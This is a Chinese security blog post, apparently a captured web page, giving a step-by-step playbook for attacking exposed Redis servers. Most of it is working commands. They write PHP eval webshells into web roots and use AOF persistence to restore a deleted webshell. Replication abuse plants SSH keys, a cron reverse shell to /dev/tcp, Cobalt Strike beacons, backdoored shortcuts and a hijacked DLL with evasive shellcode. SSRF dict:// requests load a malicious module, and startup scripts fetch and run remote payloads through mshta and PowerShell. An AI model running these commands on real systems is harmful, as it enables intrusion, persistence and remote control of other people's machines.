<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/fc91a408ddc88709de58aba050248a44.png"></p>
<p><strong>WEB绝对路径写Wbeshell</strong><br>如果Redis环境中同时存在WEB环境，尝试获取到绝对路径后写入webshell，Windows+PHPStudy:</p>
<pre class="line-numbers language-cmd"><code class="language-cmd">config set dir "D:/phpstudy_pro/WWW" 
config set dbfilename redisshell.php
set x "\r\n\r\<?php eval($_GET[1]);?>\r\n\r\n"
save<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/f9bae99834a2ca2f2665c1b9b660413d.png"></p>
<p>在CentOS+PHPStudy下：</p>
<pre class="line-numbers language-cmd"><code class="language-cmd">config set dir "/www/admin/localhost_80/wwwroot/" 
config set dbfilename redisshell.php
set x "\n\n<?php eval($_GET[1]);?>\n\n"
save<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/2ef26d7345cd7a1e6e20a88abe52e49e.png"></p>
<p>Centos + Apache（066？ redis写的shell不读取？）:</p>
<h4 id="AOF-配置重写持久化"><a href="#AOF-配置重写持久化" class="headerlink" title="AOF+配置重写持久化"></a>AOF+配置重写持久化</h4><p>由于不能设置appendfilename参数，不能AOF写任意后缀文件。但是可以通过该方式进行权限维持，在配置文件开启AOF后，Redis在重启后会执行其中的命令以恢复数据，结合配置文件重写达到redis在重启后写入webshell的效果(save之类的命令不会被aof记录)，执行命令：</p>
<pre class="line-numbers language-cmd"><code class="language-cmd">#每秒保存命令（如果已经在默认位置存在aof文件，就使用该配置保存命令，不要使用bgrewriteaof，redis会优先恢复默认目录的aof,用该命令控制写入aof的内容即可。）
#config set appendfsync everysec
#关闭只读
CONFIG SET slave-read-only no      
#设置持久化数据保存目录
config set dir "D:/phpstudy_pro/WWW/Redis"   
#设置RDB文件名
config set dbfilename redisshell.php  
#设置一个key
set x "\r\n\r\<?php eval($_GET[1]);?>\r\n\r\n"   
#设置aof增长重写幅度，1kb涨到1.5kb就重写
config set auto-aof-rewrite-percentage 50
#设置AOF文件最小重写的大小（字节）。第一次达到1mb就重写
config set auto-aof-rewrite-min-size 10000
#表示10秒内如果至少有 1 个 key 的值变化，则保存rdb
config set save "10 1"  
 #将内存中执行的命令保存到aof文件
 bgrewriteaof
 #开启AOF持久化
config set appendonly yes
 #重写配置
CONFIG REWRITE                       <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>由于在10秒内设置了key,触发保存规则，写入了PHP文件：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/f89cc1a5cae127346a6582c753dea373.png"><br>模拟管理员删除PHP文件、然后重启Redis、Redis工作后的键写入:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/db05612d3c4eae8e9499a12e2bf884d5.gif"></p>
<h3 id="ACL文件"><a href="#ACL文件" class="headerlink" title="ACL文件"></a>ACL文件</h3><blockquote>
<p>6.0 aclfile ACL SAVE</p>
</blockquote>
<h3 id="主从复制无损写文件-master-slave模式"><a href="#主从复制无损写文件-master-slave模式" class="headerlink" title="主从复制无损写文件(master/slave模式)"></a>主从复制无损写文件(master/slave模式)</h3><p>通过主从复制，master 会将内存数据通过 bgsave 落地到 rdb，从而同步给slave。攻击者可以伪造一个master，保存到rdb的数据可以自行控制，这样就没有附加的额外数据，落地无损的文件。利用命令来设置主服务器<code>SLAVEOF host port / REPLICAOF host port</code>(REPLICAOF &gt; 5.0.0) ，执行命令后的Redis身份会切换为从服务器，然后通过与主服务器交互进行数据同步(会导致目标Redis数据丢失)。使用 <a target="_blank" rel="noopener" href="https://github.com/r35tart/RedisWriteFile">RedisWriteFile</a> 脚本模拟master测试利用(需要网络互通,否则脚本会卡在从机连接位置)：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/44800dff8965ebaa84c88b226962fb81.png"></p>
<p><strong>Linux写SSH公钥</strong></p>
<pre class="line-numbers language-cmd"><code class="language-cmd">python3 RedisWriteFile.py --rhost 192.168.11.133 --rport 6379 --lhost 192.168.11.1 --lport 16379 --rpath "/root/.ssh" --rfile authorized_keys --lfile ./SSH/authorized_keys<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/85962012cf8bcebde873f98e9707d9eb.png"></p>
<p><strong>Linux写计划任务</strong><br>Windows下编写计划任务文件注意<code>\r\n</code>换行要变成<code>\n\n</code>,Ubuntu计划任务文件尾行需要换行：</p>
<pre class="line-numbers language-elixir"><code class="language-elixir">SHELL<span class="token operator">=</span><span class="token operator">/</span>bin<span class="token operator">/</span>bash
PATH<span class="token operator">=</span><span class="token operator">/</span>usr<span class="token operator">/</span>local<span class="token operator">/</span><span class="token attr-name">sbin:</span><span class="token operator">/</span>usr<span class="token operator">/</span>local<span class="token operator">/</span><span class="token attr-name">bin:</span><span class="token operator">/</span><span class="token attr-name">sbin:</span><span class="token operator">/</span><span class="token attr-name">bin:</span><span class="token operator">/</span>usr<span class="token operator">/</span><span class="token attr-name">sbin:</span><span class="token operator">/</span>usr<span class="token operator">/</span>bin
<span class="token operator">*</span> <span class="token operator">*</span> <span class="token operator">*</span> <span class="token operator">*</span> <span class="token operator">*</span> root bash <span class="token operator">-</span>i <span class="token operator">></span><span class="token operator">&amp;</span> <span class="token operator">/</span>dev<span class="token operator">/</span>tcp<span class="token operator">/</span><span class="token number">192.168</span><span class="token punctuation">.</span><span class="token number">11.1</span><span class="token operator">/</span><span class="token number">6667</span> <span class="token number">0</span>><span class="token argument variable">&amp;1</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>脚本执行命令：</p>
<pre class="line-numbers language-cmd"><code class="language-cmd">python3 RedisWriteFile.py --rhost 192.168.11.133 --rport 6379 --lhost 192.168.11.1 --lport 16379 --rpath "/etc/cron.d" --rfile shell --lfile ./cron/cron.d<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>反弹成功：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/556c48f2fd6871459c7122db487e6afe.png"><br><strong>Windows写启动项</strong></p>
<pre class="line-numbers language-cmd"><code class="language-cmd">python3 RedisWriteFile.py --rhost 192.168.200.97 --rport 6379 --lhost 192.168.200.138 --lport 16379 --rpath "C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp" --rfile beacon.exe --lfile beacon.exe<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/575cd5cb885b8c831ad1805f222eeac9.png"></p>
<p><strong>Windows文件覆盖/新增</strong><br>现在可以对一些常用位置的文件进行覆盖了，如桌面快捷方式、快速启动栏、软件程序、动态链接库等。这些操作基本上都是需要管理员权限的。</p>
<p><em>快捷方式</em><br>先使用文件探测方式探测是否存在常见的快捷方式并确认好启动文件位置，一般在公用桌面存在一些：</p>
<pre class="line-numbers language-cmd"><code class="language-cmd">EVAL "return dofile('C:/Users/Public/Desktop/Google Chrome.lnk')" 0
EVAL "return dofile('C:/Users/Public/Desktop/Notepad++.lnk')" 0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>在本地建立快捷方式 ，根据在目标主机上获取的文件位置信息可以在快捷方式的目标中写入命令<code>C:\Windows\System32\cmd.exe /c calc &amp;  "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"</code> ，将运行方式设置为最小化：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/6e1b28cea83b9a7b8e6d7da489374659.png"><br>执行脚本同步：</p>
<pre class="line-numbers language-cmd"><code class="language-cmd">python3 RedisWriteFile.py --rhost 192.168.200.97 --rport 6379 --lhost 192.168.200.138 --lport 16379 --rpath "C:/Users/Public/Desktop" --rfile "Google Chrome.lnk" --lfile "Google Chrome.lnk"<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/093ab56ed159388b827b9b47d7f641b7.gif"></p>
<p><em>快速启动栏</em><br>在文件夹<code>%AppData%\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar</code>中，可以修改，但是测试新增文件并不会在任务栏显示。<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/af92092b9edcc756437a953dc0962cdc.png"></p>
<p><em>DLL劫持</em><br>开启Process Monitor监控，然后启动Redis，观察到Redis在其安装目录加载了<code>dbghelp.dll</code>和<code>CRYPTBASE.DLL</code>两个DLL,这两个DLL本来是在系统目录中的，加载过程中存在了DLL加载顺序的劫持（DLL劫持相关基础可以查看<a target="_blank" rel="noopener" href="http://xxxxxx/">DLL劫持漏洞</a>）：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/c698ca3d8fc6bf984232694d40a3e131.png"><br>利用之前查看进程的架构，利用的DLL也需要是相同架构：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/2cb69eba140ae0b8ab41cb68f923aad4.png"><br>生成Cobalt Strike的x64 DLL后，直接使用NetClone工具复制出DLL的导出函数进行代理转发：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/7edb112f6328ef400d794b77fe73d4df.png"><br>生成完成后查看DLL架构x64为8664，x86为014C(用记事本打开二进制文件查看字符串64位是<code>PE  d†</code>，32 位是<code>PE L</code>):<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/9956b741c13fd911842ef7a119dad9c8.png"></p>
<p>参考 <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/8153?page=3">Redis on Windows 出网利用探索</a> 一文中，DLL劫持还可以由 <code>BGSAVE</code>等命令触发。使用 <a target="_blank" rel="noopener" href="https://github.com/slaeryan/AQUARMOURY/tree/master/Brownie">Brownie</a>来进行DLL的免杀，<a target="_blank" rel="noopener" href="https://github.com/monoxgas/Koppeling">Koppeling</a> 项目来快速进行DLL函数代理转发构建：<br>1.生成Cobalt Strike后门：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/8b422092ae816be1b087546e7cab5b0b.png"><br>2.使用Brownie项目中的AES.py脚本加密Bin输出logo.png：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/5a54ed94e9bbf0458596813450794f48.png"><br>3.在Brownie中配置与加密脚本中一致的AES-KEY。<br>4.DLL中使用<code>CreateProcess</code>和<code>CreateRemoteThread</code>API组合注入shellcode:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/84a5e8c8215a8c38f5104335ef0cd689.png"><br>5.生成项目DLL后使用Koppeling项目中的Python脚本来链接到转发DLL:</p>
<pre class="line-numbers language-python"><code class="language-python">python3 PyClone<span class="token punctuation">.</span>py AES<span class="token punctuation">.</span>dll C<span class="token punctuation">:</span>\windows\system32\dbghelp<span class="token punctuation">.</span>dll <span class="token operator">-</span>o dbghelp<span class="token punctuation">.</span>dll<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/e4db3f27a21559bd617154e98f92969c.png"><br>6.使用Redis主从同步脚本写入后执行<code>bgsave</code>触发DLL劫持：</p>
<pre class="line-numbers language-python"><code class="language-python">python3 RedisWriteFile<span class="token punctuation">.</span>py <span class="token operator">-</span><span class="token operator">-</span>rhost <span class="token number">192.168</span><span class="token punctuation">.</span><span class="token number">200.97</span> <span class="token operator">-</span><span class="token operator">-</span>rport <span class="token number">6379</span> <span class="token operator">-</span><span class="token operator">-</span>lhost <span class="token number">192.168</span><span class="token punctuation">.</span><span class="token number">200.138</span> <span class="token operator">-</span><span class="token operator">-</span>lport <span class="token number">16379</span> <span class="token operator">-</span><span class="token operator">-</span>rpath <span class="token string">"D:/phpstudy_pro/Extensions/redis3.0.504"</span> <span class="token operator">-</span><span class="token operator">-</span>rfile <span class="token string">"dbghelp.dll"</span> <span class="token operator">-</span><span class="token operator">-</span>lfile <span class="token string">"dbghelp.dll"</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/188376a7149dc5dbc46e0a67415437cc.gif"></p>
<h3 id="Redis恶意模块"><a href="#Redis恶意模块" class="headerlink" title="Redis恶意模块"></a>Redis恶意模块</h3><p>同样是利用主从复制写入文件，但是提供了模块支持，可以使用loadn xxx加载模板，然后通过模块扩展进行命令执行等操作，类似MySQL的UDF</p>
<p>MODULE LOAD </p>
<p><a target="_blank" rel="noopener" href="https://github.com/RicterZ/RedisModules-ExecuteCommand">https://github.com/RicterZ/RedisModules-ExecuteCommand</a></p>
<p>set 1234 123<br>key *<br>get 1234<br>2.主从复制<br>SLAVEOF 192.168.11.133 6379 </p>
<p>3.主从复制RCE , 扩展加载<br><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/113116872">https://zhuanlan.zhihu.com/p/113116872</a><br>docker search redis5.0    //查找镜像<br>docker pull damonevking/redis5.0   //拉取下图第三个镜像</p>
<p>使用dict协议-主从复制Getshell（Linux）：</p>
<pre class="line-numbers language-vala"><code class="language-vala">#查看当前redis的相关配置
ssrf.php?url=dict://192.168.200.97:6379/info
#设置备份文件名
ssrf.php?url=dict://192.168.200.97:6379/config:set:dbfilename:exp.so
#连接恶意Redis服务器
ssrf.php?url=dict://192.168.200.97:6379/slaveof:192.168.172.129:1234
#加载恶意模块
ssrf.php?url=dict://192.168.200.97:6379/module:load:./exp.so
#切断主从复制
ssrf.php?url=dict://192.168.200.97:6379/slaveof:no:one
#执行系统命令
 ssrf.php?url=dict://192.168.200.97:6379/system.rev:192.168.172.129:9999<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>主从复制：<br>主从都要关闭 CONFIG SET slave-read-only no ，因为从服务器会复制状态<br>CONFIG SET slave-read-only no </p>
<p>SLAVEOF host port</p>
<h3 id="RedisWriteFile-windows主从复制的利用"><a href="#RedisWriteFile-windows主从复制的利用" class="headerlink" title="RedisWriteFile(windows主从复制的利用)"></a>RedisWriteFile(windows主从复制的利用)</h3><p>windows写DLL</p>
<h3 id="Redis-load-so"><a href="#Redis-load-so" class="headerlink" title="Redis load so"></a>Redis load so</h3><p>mshta</p>
<pre class="line-numbers language-cmd?linenums"><code class="language-cmd?linenums">config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
config set dbfilename shell.bat
set x "\r\n\r\nmshta http://192.168.230.133:8080/shell\r\n\r\n"
save<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<pre class="line-numbers language-podspec?linenums"><code class="language-podspec?linenums">config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
config set dbfilename shell.bat
set x "\r\n\r\npowershell -windowstyle hidden -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.230.133/shell.ps1');xx.ps1\"\r\n\r\n"
save<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="0x04-参考链接"><a href="#0x04-参考链接" class="headerlink" title="0x04 参考链接"></a>0x04 参考链接</h2><p><a target="_blank" rel="noopener" href="https://paper.seebug.org/975/">https://paper.seebug.org/975/</a><br><a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/5366.html">https://www.secpulse.com/archives/5366.html</a><br><a target="_blank" rel="noopener" href="https://blog.xray.cool/post/learning-redis-security/">https://blog.xray.cool/post/learning-redis-security/</a></p>
<p>备份redis数据：<br><a target="_blank" rel="noopener" href="https://jkme.github.io/redis-on-windows-dll-hijack.html">https://jkme.github.io/redis-on-windows-dll-hijack.html</a></p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">YangHao</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://yanghaoi.github.io/2021/10/09/redis-lou-dong-li-yong/">https://yanghaoi.github.io/2021/10/09/redis-lou-dong-li-yong/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">YangHao</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/Redis%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">
                                    <span class="chip bg-color">Redis漏洞利用</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="qq,qzone,wechat,weibo,douban" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/valine/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: 'yJD2aXK8GcbXmInljhvHyB1j-gzGzoHsz',
        appKey: 'p2SkNvakylQnkba2lMvTS09d',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: 'just go go'
    });
</script>

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2021/10/09/redis-lou-dong-li-yong/">
                    <div class="card-image">
                        
                        <img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/c54b4438d8fb064d0c827998804a2f89.png" class="responsive-img" alt="Redis漏洞利用">
                        
                        <span class="card-title">Redis漏洞利用</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            在不同系统下搭建Redis漏洞环境，测试各种连接工具，整理总结Redis命令的使用、不用环境下的利用方式和相关工具的使用。
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-10-09
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/" class="post-category">
                                    漏洞利用
                                </a>
                            
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Redis%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">
                        <span class="chip bg-color">Redis漏洞利用</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/10/07/ssrf-lou-dong-ji-chu/">
                    <div class="card-image">
                        
                        <img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/8e747a43120a59986fdbc8840ff6f6f1.jpg" class="responsive-img" alt="SSRF漏洞基础">
                        
                        <span class="card-title">SSRF漏洞基础</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            对SSRF漏洞的类型、原理、协议使用、限制绕过、攻击其他组件、常用的利用工具和方法等进行记录。
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-10-07
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E/" class="post-category">
                                    基础漏洞
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/SSRF%E6%BC%8F%E6%B4%9E/">
                        <span class="chip bg-color">SSRF漏洞</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: Yang Hao&#39;s blog<br />'
            + '文章作者: YangHao<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
